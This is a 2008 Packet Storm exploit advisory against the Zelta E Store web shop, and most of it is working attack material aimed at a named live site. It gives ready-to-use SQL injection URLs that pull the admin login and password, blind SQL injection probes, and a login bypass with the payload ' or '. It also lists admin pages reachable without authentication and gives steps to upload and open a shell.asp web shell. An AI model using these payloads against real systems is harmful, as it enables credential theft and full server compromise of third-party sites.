Zelta E Store Multiple Vulnerabilities

2008-12-17T00:00:00
ID PACKETSTORM:73090
Type packetstorm
Reporter ZoRLu
Modified 2008-12-17T00:00:00

Description

                                        
                                            `[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns.   
[~]  
[~] script: http://www.zeltatrade.com/  
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com  
[~]  
[~] Date: 16/12/2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo   
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~] -----------------------------------------------------------  
  
exp for demo: (R-SQL)  
  
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin  
  
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin  
  
  
exp for demo: (B-SQL)  
  
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)  
  
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)  
  
  
exp for demo: (auth bypass)  
  
http://joineazy.com/members/login.asp  
  
username: trt-turk@hotmail.com  
  
pass: ' or '  
  
  
exp for demo: (admin bypass)  
  
http://joineazy.com/embadmin/admin_main.asp  
  
http://joineazy.com/embadmin/site_setup.asp  
  
http://joineazy.com/embadmin/main_baseimage.asp  
  
  
exp for demo: (RFU)  
  
firs you register to site  
  
login to site and edit your pictures select your shell.asp  
  
go your shell asp:  
  
http://joineazy.com/members/member_pictures/shell.asp  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke   
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`